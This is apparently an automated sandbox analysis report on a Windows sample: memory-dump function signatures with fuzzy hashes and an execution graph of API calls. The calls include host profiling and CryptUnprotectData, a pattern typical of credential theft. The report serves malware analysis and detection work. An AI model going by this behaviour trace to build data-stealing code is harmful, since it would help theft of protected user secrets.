        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: LibraryLoad$ErrorLast
        • String ID: api-ms-
        • API String ID: 3177248105-2084034818
        • Opcode ID: 904f401a43041464464b0de80a1b296cacf8507511157e6db8fc8b91ac5b216b
        • Instruction ID: 9218f30c26a7f75025bf5317206f9db83cc6a179ad354853b6ed57ef07e2977e
        • Opcode Fuzzy Hash: 904f401a43041464464b0de80a1b296cacf8507511157e6db8fc8b91ac5b216b
        • Instruction Fuzzy Hash: 74E04830244308F7DF102FA0DC46FA93BD59F54B50F144020FA4DE88E0D7619994B9C4
        APIs
        • GetConsoleOutputCP.KERNEL32(429EDEEC,00000000,00000000,00000000), ref: 0010821A
          • Part of subcall function 0010A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00107CA8,?,00000000,-00000008), ref: 0010A463
        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00108475
        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001084BD
        • GetLastError.KERNEL32 ref: 00108560
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
        • String ID:
        • API String ID: 2112829910-0
        • Opcode ID: bd1d2466302dd17ede07108320a8f2a782b3bad4f2760b5760137a178ad0f261
        • Instruction ID: 827e9f8db76b88181383b7cd9ed45bf9dc769a65430f6d082518a9048a40107d
        • Opcode Fuzzy Hash: bd1d2466302dd17ede07108320a8f2a782b3bad4f2760b5760137a178ad0f261
        • Instruction Fuzzy Hash: 38D157B5D042589FCF15CFA8D880AEDBBB5FF49304F18812AE895EB391DB70A941CB50
        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: AdjustPointer
        • String ID:
        • API String ID: 1740715915-0
        • Opcode ID: 4f9f851db959218e17830b8af00069dd56df1b717bb8bba18e618a23a543018f
        • Instruction ID: 5cb5ebbee2f318620cf4c1f0c915555f89021c19c0c16e78d7437929ec8a56e3
        • Opcode Fuzzy Hash: 4f9f851db959218e17830b8af00069dd56df1b717bb8bba18e618a23a543018f
        • Instruction Fuzzy Hash: DB51A0B570830A9FDB29AF10D841FBAB7F4EF05310F144529EA0947D92D731AD81EB92
        APIs
          • Part of subcall function 0010A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00107CA8,?,00000000,-00000008), ref: 0010A463
        • GetLastError.KERNEL32 ref: 0010A837
        • __dosmaperr.LIBCMT ref: 0010A83E
        • GetLastError.KERNEL32(?,?,?,?), ref: 0010A878
        • __dosmaperr.LIBCMT ref: 0010A87F
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
        • String ID:
        • API String ID: 1913693674-0
        • Opcode ID: fcc68f8aa47b56c619f24af6d59cc890f8586330904874d25a2023ea049201bd
        • Instruction ID: 27f9aae454ffaa80eb4bb1a8ffcfca07c57530293118df4010b29e7efd6d3e12
        • Opcode Fuzzy Hash: fcc68f8aa47b56c619f24af6d59cc890f8586330904874d25a2023ea049201bd
        • Instruction Fuzzy Hash: F1213431600305BFCB25AF65C88087BB7ADFF54325744C42AF99987591DBB0ED418792
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9215e8f8cdee4c11bc912f48d66ccc7efb7b65b9c55f56791336e9f1f2e5c672
        • Instruction ID: dbdd260330d1887509daa58869da346ec433de7917634637ae03f6bda72c91a9
        • Opcode Fuzzy Hash: 9215e8f8cdee4c11bc912f48d66ccc7efb7b65b9c55f56791336e9f1f2e5c672
        • Instruction Fuzzy Hash: 1921F33160020ABFCB28AF75CC819BBB7AAFF503647104524FA94D75D1D7B8ED8097A0
        APIs
        • GetEnvironmentStringsW.KERNEL32 ref: 0010B771
          • Part of subcall function 0010A3B7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00107CA8,?,00000000,-00000008), ref: 0010A463
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010B7A9
        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0010B7C9
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
        • String ID:
        • API String ID: 158306478-0
        • Opcode ID: 26374875e95989d8533ac79e8c9c06e7926ca0ac435fcf01b0f0a705d90de103
        • Instruction ID: 58fe56ff332e468e83bfe13ff3282bfebf328419279a1b49f0845722c9c5fb97
        • Opcode Fuzzy Hash: 26374875e95989d8533ac79e8c9c06e7926ca0ac435fcf01b0f0a705d90de103
        • Instruction Fuzzy Hash: 201144B1515606BFE71527B15CCDCAF3A6DDEE53987104021F941911C1FBB0CD004171
        APIs
        • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,001110F4,00000000,00000001,00000000,00000000,?,001085B4,00000000,00000000,00000000), ref: 00112350
        • GetLastError.KERNEL32(?,001110F4,00000000,00000001,00000000,00000000,?,001085B4,00000000,00000000,00000000,00000000,00000000,?,00108B3B,00000000), ref: 0011235C
          • Part of subcall function 00112322: CloseHandle.KERNEL32(FFFFFFFE,0011236C,?,001110F4,00000000,00000001,00000000,00000000,?,001085B4,00000000,00000000,00000000,00000000,00000000), ref: 00112332
        • ___initconout.LIBCMT ref: 0011236C
          • Part of subcall function 001122E4: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00112313,001110E1,00000000,?,001085B4,00000000,00000000,00000000,00000000), ref: 001122F7
        • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,001110F4,00000000,00000001,00000000,00000000,?,001085B4,00000000,00000000,00000000,00000000), ref: 00112381
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
        • String ID:
        • API String ID: 2744216297-0
        • Opcode ID: 49ae6610cefdca0f3cf267203827e0a9808e1634e438dd07b9a73f0e61b2f8bb
        • Instruction ID: f5baadfef3d0862aa1d5573a95b882c0f23340c3817140d9512280d33855c418
        • Opcode Fuzzy Hash: 49ae6610cefdca0f3cf267203827e0a9808e1634e438dd07b9a73f0e61b2f8bb
        • Instruction Fuzzy Hash: FDF01C36510115FBCF261FD5EC08AC93F66FB593A0B044124FA1889620C77288B0DB90
        APIs
        • OffsetRect.USER32(00000000,00000000,00000000), ref: 001146F6
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: OffsetRect
        • String ID: 0$Zatlat
        • API String ID: 177026234-1547964091
        • Opcode ID: a36b2adc7ad3738461c45556e0ba2813d37c7f6f60e487dec19341b0f06e36e2
        • Instruction ID: d1c73bc28031cf9b216b10297ae50eea4ff98c0bbe79e14ee49d7dfbd1f5649f
        • Opcode Fuzzy Hash: a36b2adc7ad3738461c45556e0ba2813d37c7f6f60e487dec19341b0f06e36e2
        • Instruction Fuzzy Hash: D291EE715083808BD314DF68C8597AFBBE0AFC9718F180A2CF5D89B692C7B5D588CB52
        APIs
        • ___except_validate_context_record.LIBVCRUNTIME ref: 000FA3EF
        • __IsNonwritableInCurrentImage.LIBCMT ref: 000FA4A3
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CurrentImageNonwritable___except_validate_context_record
        • String ID: csm
        • API String ID: 3480331319-1018135373
        • Opcode ID: 7f5542fe4f7f5e23926db67c0ed3b75b1c25ea5de84d1b68fdc7ca51a00dbf08
        • Instruction ID: 20e240c2408154878fad1320827c47271d12eb4ab7187b47d9d518e6c82c1aab
        • Opcode Fuzzy Hash: 7f5542fe4f7f5e23926db67c0ed3b75b1c25ea5de84d1b68fdc7ca51a00dbf08
        • Instruction Fuzzy Hash: 4441E570B0020C9BCF10DF68C844AAE7BF5AF86314F148155EA1C5B792D775AA45DF91
        APIs
        • EncodePointer.KERNEL32(00000000,?), ref: 000FACE2
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: EncodePointer
        • String ID: MOC$RCC
        • API String ID: 2118026453-2084237596
        • Opcode ID: 803c779bdeb309d26075986129b0280cf67d440b1b4b68acd172621882fdceea
        • Instruction ID: e967326541b286e09e0f442d2046458f54ef740d99c66d719a6954019fdac232
        • Opcode Fuzzy Hash: 803c779bdeb309d26075986129b0280cf67d440b1b4b68acd172621882fdceea
        • Instruction Fuzzy Hash: 044137B1A0020DEFCF16DF94C981AEEBBB5BF49301F188059FA096BA11D7359950EB52
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F2425
        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000F246A
          • Part of subcall function 000F5578: _Yarn.LIBCPMT ref: 000F5597
          • Part of subcall function 000F5578: _Yarn.LIBCPMT ref: 000F55BB
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
        • String ID: bad locale name
        • API String ID: 1908188788-1405518554
        • Opcode ID: f01035ebc70e628acf4175206cd93298740384bf0b4643a53f4de55edc2c47e7
        • Instruction ID: 419aa35cea40038da27064ffa8e110ebecb7bcab7705fd21c93dfcd25d920eec
        • Opcode Fuzzy Hash: f01035ebc70e628acf4175206cd93298740384bf0b4643a53f4de55edc2c47e7
        • Instruction Fuzzy Hash: 60F01D71501B408ED370DF359804753BEE0AF29710F048A1DD6CAC7A42D375E548CBA6
        APIs
        • std::_Lockit::_Lockit.LIBCPMT ref: 000F2CFF
        • std::_Lockit::~_Lockit.LIBCPMT ref: 000F2D1A
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: Lockitstd::_$Lockit::_Lockit::~_
        • String ID: ios_base::badbit set
        • API String ID: 593203224-3882152299
        • Opcode ID: 2c4f0108e3409b8ba7344c870b89e8469e6da7b2d8684fb64bff22280edd91ca
        • Instruction ID: 7353c0cd769a70aa45ae86d6086e26df815fe3d7086f464c05f70dcf05fbe12c
        • Opcode Fuzzy Hash: 2c4f0108e3409b8ba7344c870b89e8469e6da7b2d8684fb64bff22280edd91ca
        • Instruction Fuzzy Hash: 98E08C71404215CFD324DF14E881BE2B3E0EB24321F20047EE2C583991EBB058C0DB80
        Memory Dump Source
        • Source File: 00000000.00000002.2600968507.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
        • Associated: 00000000.00000002.2600924617.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601002419.0000000000115000.00000002.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601020508.0000000000120000.00000004.00000001.01000000.00000003.sdmp
        • Associated: 00000000.00000002.2601052391.0000000000171000.00000002.00000001.01000000.00000003.sdmp
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_f0000_mkFOY01Gl5.jbxd
        Similarity
        • API ID: CommandLine
        • String ID: %u
        • API String ID: 3253501508-749584840
        • Opcode ID: 4ed2f6fd6e9cb37ce257540d228c41b9d21b99ef4632ea622e07eff78136d972
        • Instruction ID: e4e940f132595d573d2655aaf2d7127bb39d4d1a379bbba6e589d67d20a6c1d0
        • Opcode Fuzzy Hash: 4ed2f6fd6e9cb37ce257540d228c41b9d21b99ef4632ea622e07eff78136d972
        • Instruction Fuzzy Hash: CBB048B8800710CF8B458FA8AA080893AB1FB8C3023A89056A84A82E20D63502C4ABA1

        Execution Graph

        Execution Coverage: 15.1%
        Dynamic/Decrypted Code Coverage: 0%
        Signature Coverage: 18.2%
        Total number of Nodes: 335
        Total number of Limit Nodes: 25
        execution_graph 11441 428343 11443 428360 11441->11443 11442 42845b FreeLibrary 11444 42846a 11442->11444 11443->11442 11443->11443 11445 42847a GetComputerNameExA 11444->11445 11446 4284e6 GetComputerNameExA 11445->11446 11448 42861d 11446->11448 11449 41b840 11450 41b854 11449->11450 11452 41b93c 11449->11452 11453 41b990 11450->11453 11454 41b9ed 11453->11454 11454->11454 11457 43d6e0 11454->11457 11456 41bafd 11456->11452 11458 43d700 11457->11458 11459 43d86e 11458->11459 11461 43aac0 LdrInitializeThunk 11458->11461 11459->11456 11461->11459 11645 410f03 11646 410f44 11645->11646 11647 402a20 RtlFreeHeap 11646->11647 11648 41108a 11647->11648 11663 41f040 11648->11663 11650 4110a3 11674 41f890 11650->11674 11652 4110c3 11653 41fae0 LdrInitializeThunk 11652->11653 11654 4110e3 11653->11654 11655 4227b0 RtlAllocateHeap LdrInitializeThunk 11654->11655 11656 41110c 11655->11656 11657 422c30 RtlAllocateHeap LdrInitializeThunk 11656->11657 11658 411115 11657->11658 11659 424f10 LdrInitializeThunk 11658->11659 11660 411135 11659->11660 11661 430cf0 6 API calls 11660->11661 11662 41115e 11661->11662 11664 41f0c0 11663->11664 11665 43d6e0 LdrInitializeThunk 11664->11665 11666 41f2e7 11665->11666 11667 41f52a 11666->11667 11668 41f4fb 11666->11668 11671 41f4e4 11666->11671 11672 41f2f6 11666->11672 11669 41c100 LdrInitializeThunk 11667->11669 11668->11650 11669->11668 11670 41bfe0 LdrInitializeThunk 11670->11668 11671->11668 11671->11670 11671->11671 11673 43d6e0 LdrInitializeThunk 11672->11673 11673->11671 11675 41f939 11674->11675 11678 4199d0 11675->11678 11677 41fabb 11679 4199f0 11678->11679 11680 43d6e0 LdrInitializeThunk 11679->11680 11681 419a67 11680->11681 11682 41c100 LdrInitializeThunk 11681->11682 11683 419c0b 11681->11683 11682->11681 11683->11677 11684 43a100 GetLogicalDrives 11685 43a116 11684->11685 11462 417ac5 11464 417e8a 11462->11464 11465 417ad1 11462->11465 11465->11464 11465->11465 11466 43d6e0 LdrInitializeThunk 11465->11466 11467 402a20 
11465->11467 11466->11465 11468 402b37 11467->11468 11469 402a2e 11467->11469 11470 402afe 11469->11470 11473 402a43 11469->11473 11476 402aa1 11469->11476 11471 402b24 11470->11471 11474 402a20 RtlFreeHeap 11470->11474 11481 4389c2 RtlFreeHeap 11471->11481 11472 402a83 11480 4389c2 RtlFreeHeap 11472->11480 11473->11468 11473->11472 11475 402a20 RtlFreeHeap 11473->11475 11474->11470 11475->11473 11482 4389c2 RtlFreeHeap 11476->11482 11686 41fc87 11688 41fc34 11686->11688 11687 43df00 2 API calls 11687->11688 11688->11686 11688->11687 11689 417009 11691 41704c 11689->11691 11692 416e0c 11689->11692 11694 416df5 11689->11694 11690 43d8c0 LdrInitializeThunk 11690->11692 11691->11694 11696 43aac0 LdrInitializeThunk 11691->11696 11692->11689 11692->11690 11692->11691 11692->11694 11695 43d4f0 LdrInitializeThunk 11692->11695 11695->11692 11696->11694 11697 43b00a 11698 43b053 11697->11698 11699 43b0ce 11698->11699 11701 43aac0 LdrInitializeThunk 11698->11701 11701->11699 11702 41c80e 11706 41dcb0 11702->11706 11718 421b30 11702->11718 11703 41c82c 11707 41dcc6 11706->11707 11715 41dd90 11706->11715 11708 43d4f0 LdrInitializeThunk 11707->11708 11707->11715 11709 41de6d 11708->11709 11712 41deaa 11709->11712 11722 436a90 11709->11722 11714 43d9d0 LdrInitializeThunk 11712->11714 11712->11715 11717 41decc 11714->11717 11715->11703 11717->11715 11717->11717 11725 43aac0 LdrInitializeThunk 11717->11725 11720 421b49 11718->11720 11721 421ca8 11718->11721 11719 41bfe0 LdrInitializeThunk 11719->11721 11720->11719 11720->11720 11721->11703 11723 43d4f0 LdrInitializeThunk 11722->11723 11724 436abd 11723->11724 11725->11715 11483 41c051 11484 41c078 11483->11484 11487 41c100 11484->11487 11490 43d4f0 11487->11490 11489 41c159 11492 43d510 11490->11492 11491 43d68e 11491->11489 11492->11491 11494 43aac0 LdrInitializeThunk 11492->11494 11494->11491 11495 4212d0 11500 420ac0 11495->11500 11497 42138f 11514 43aac0 LdrInitializeThunk 11497->11514 11500->11495 11500->11497 11500->11500 
11502 43dda0 11500->11502 11506 43e510 11500->11506 11501 42139e 11503 43ddc0 11502->11503 11505 43dece 11503->11505 11515 43aac0 LdrInitializeThunk 11503->11515 11505->11500 11508 43e540 11506->11508 11507 43e5be 11513 43e6ae 11507->11513 11517 438800 11507->11517 11508->11507 11516 43aac0 LdrInitializeThunk 11508->11516 11511 43e601 11511->11513 11520 43aac0 LdrInitializeThunk 11511->11520 11513->11500 11514->11501 11515->11505 11516->11507 11518 438838 11517->11518 11519 43888f RtlAllocateHeap 11517->11519 11518->11519 11519->11511 11520->11513 11726 417592 11730 417591 11726->11730 11727 43d8c0 LdrInitializeThunk 11727->11730 11728 4178ca 11730->11726 11730->11727 11730->11728 11731 43d9d0 LdrInitializeThunk 11730->11731 11732 4178a3 CryptUnprotectData 11730->11732 11733 401eb0 11730->11733 11731->11730 11732->11728 11732->11730 11734 401eb8 11733->11734 11735 401edc 11733->11735 11738 401ee0 11734->11738 11735->11730 11737 401edb 11737->11730 11739 401ef5 11738->11739 11745 401f3d 11738->11745 11740 4020a7 11739->11740 11742 4021cf 11739->11742 11743 4020f5 11739->11743 11739->11745 11759 402fa0 11740->11759 11744 402309 11742->11744 11742->11745 11757 40224f 11742->11757 11743->11744 11743->11745 11752 402152 11743->11752 11746 402a20 RtlFreeHeap 11744->11746 11745->11737 11746->11745 11747 402fa0 2 API calls 11747->11757 11748 401ee0 2 API calls 11748->11752 11749 40228c 11749->11745 11750 402a20 RtlFreeHeap 11749->11750 11750->11745 11751 402a20 RtlFreeHeap 11751->11749 11752->11745 11752->11748 11752->11749 11758 4025c9 11752->11758 11753 401ee0 2 API calls 11753->11757 11755 4025a3 11756 402a20 RtlFreeHeap 11755->11756 11756->11749 11757->11745 11757->11747 11757->11749 11757->11753 11757->11755 11757->11758 11767 402b50 11757->11767 11758->11751 11760 402fb4 11759->11760 11762 403219 11759->11762 11760->11762 11764 438800 RtlAllocateHeap 11760->11764 11761 4031f4 11761->11762 11771 4389c2 RtlFreeHeap 11761->11771 11762->11745 11763 402fff 11763->11762 
11765 438800 RtlAllocateHeap 11763->11765 11764->11763 11765->11761 11769 402b64 11767->11769 11770 402beb 11767->11770 11769->11770 11772 402d60 11769->11772 11770->11757 11773 402d89 11772->11773 11777 438800 RtlAllocateHeap 11773->11777 11774 402dbd 11775 402b50 RtlAllocateHeap 11774->11775 11776 402e6a 11774->11776 11775->11774 11776->11770 11777->11774 11778 41d495 11779 438800 RtlAllocateHeap 11778->11779 11780 41d4a1 11779->11780 11521 421f5a 11522 4220b9 11521->11522 11523 43dda0 LdrInitializeThunk 11522->11523 11524 422110 11523->11524 11528 422138 11524->11528 11547 43e1e0 11524->11547 11525 43dda0 LdrInitializeThunk 11525->11528 11528->11525 11530 43aac0 LdrInitializeThunk 11528->11530 11531 43df00 11528->11531 11539 43e850 11528->11539 11530->11528 11532 43df30 11531->11532 11532->11532 11533 43dfae 11532->11533 11555 43aac0 LdrInitializeThunk 11532->11555 11534 438800 RtlAllocateHeap 11533->11534 11538 43e09e 11533->11538 11536 43dff1 11534->11536 11536->11538 11556 43aac0 LdrInitializeThunk 11536->11556 11538->11528 11540 43e870 11539->11540 11540->11540 11541 43e96e 11540->11541 11557 43aac0 LdrInitializeThunk 11540->11557 11542 438800 RtlAllocateHeap 11541->11542 11546 43ea72 11541->11546 11544 43e9b3 11542->11544 11544->11546 11558 43aac0 LdrInitializeThunk 11544->11558 11546->11528 11549 43e210 11547->11549 11548 43e28e 11550 438800 RtlAllocateHeap 11548->11550 11553 43e382 11548->11553 11549->11548 11559 43aac0 LdrInitializeThunk 11549->11559 11552 43e2cc 11550->11552 11552->11553 11560 43aac0 LdrInitializeThunk 11552->11560 11553->11528 11555->11533 11556->11538 11557->11541 11558->11546 11559->11548 11560->11553 11561 416c5d 11564 416c57 11561->11564 11563 417043 11566 416df5 11563->11566 11573 43aac0 LdrInitializeThunk 11563->11573 11564->11561 11564->11563 11564->11566 11567 43d9d0 11564->11567 11568 43da00 11567->11568 11571 43da7e 11568->11571 11574 43aac0 LdrInitializeThunk 11568->11574 11569 43db6e 11569->11564 11571->11569 11575 43aac0 
LdrInitializeThunk 11571->11575 11573->11566 11574->11571 11575->11569 11576 411add 11581 430f10 11576->11581 11578 411ae3 11579 430f10 6 API calls 11578->11579 11580 411aec 11579->11580 11582 430f46 KiUserCallbackDispatcher GetSystemMetrics 11581->11582 11583 430f8f DeleteObject 11582->11583 11585 430fee SelectObject 11583->11585 11587 43108a SelectObject 11585->11587 11588 4310b3 DeleteObject 11587->11588 11788 42949e 11790 4294f0 11788->11790 11789 42962e 11790->11789 11792 43aac0 LdrInitializeThunk 11790->11792 11792->11789 11793 43a71c 11794 43a7b9 LoadLibraryExW 11793->11794 11796 43a764 11793->11796 11795 43a7c7 11794->11795 11796->11794 11796->11796 11590 43b1e7 11591 43b218 11590->11591 11592 43b28e 11591->11592 11596 43aac0 LdrInitializeThunk 11591->11596 11595 43aac0 LdrInitializeThunk 11592->11595 11595->11592 11596->11592 11597 428f65 11598 428f6c 11597->11598 11599 429092 GetPhysicallyInstalledSystemMemory 11598->11599 11600 4290b9 11599->11600 11600->11600 11601 417369 11606 43d8c0 11601->11606 11603 417379 11604 43d9d0 LdrInitializeThunk 11603->11604 11605 4173a4 11603->11605 11604->11605 11607 43d8f2 11606->11607 11608 43d97e 11607->11608 11610 43aac0 LdrInitializeThunk 11607->11610 11608->11603 11610->11608 11611 41fcea 11612 43dda0 LdrInitializeThunk 11611->11612 11613 41fd04 11612->11613 11800 4180aa 11801 4180a3 11800->11801 11801->11800 11801->11801 11802 43d4f0 LdrInitializeThunk 11801->11802 11803 41829a 11801->11803 11802->11801 11804 4183e3 11803->11804 11806 43aac0 LdrInitializeThunk 11803->11806 11806->11803 11807 43b8af 11809 43b7ca 11807->11809 11808 43b949 11809->11807 11809->11808 11811 43aac0 LdrInitializeThunk 11809->11811 11811->11809 11812 41842c 11814 41845d 11812->11814 11813 436a90 LdrInitializeThunk 11813->11814 11814->11813 11815 418dcc 11814->11815 11816 418dbd 11814->11816 11816->11815 11816->11816 11817 41bfe0 LdrInitializeThunk 11816->11817 11818 419370 11817->11818 11614 43686c 11617 43ca00 11614->11617 11618 436894 
